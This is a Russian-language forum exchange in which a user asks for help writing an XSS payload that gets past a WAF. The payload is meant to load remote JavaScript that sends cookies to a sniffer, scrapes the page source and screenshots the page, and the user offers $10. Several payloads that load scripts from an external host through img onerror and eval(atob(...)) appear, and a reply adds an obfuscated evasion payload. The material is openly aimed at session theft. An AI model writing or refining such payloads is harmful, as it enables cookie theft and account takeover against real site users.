Приветствую. Имеется: XSS вида, https://host.com/parametr?i='/>XSS Задача Обойти фильтр и подгрузить js код с хоста https://site.com/, в нем передача cookie на сниффер, парсинг исходного кода страницы и скриншот страницы. Работает: <style>, <img src=x onerror=alert('xss') /> Фильтр: WAF фильтрует теги указанные ниже, в base64 не отрабатывает. Code: <script></script> Code: javascript: Code: var s = document.createElement('script'); s.src='https://domen.com/1 Code: <img src=x id=var a=document.createElement("script");a.src="https://site.com";document.body.appendChild(a);:; onerror=eval(atob(this.id))> Пробовал использовать пейлоады с OWASP, работают практически все html теги, он img до input.. Буду премного благодарен за помощь в написании правильного пайлода с img для исполнения js кода с хоста. p.s за работоспособное решение оплачу 10$ на кофе
Серебрянной пули нет, нужно фантазировать. Например: Code: <img src=x onerror=document['w'+'rite'](top['at'+'ob']('PHNjcmlwdD5hbGVydCgnSGVsbG8nKTs8L3NjcmlwdD4'));>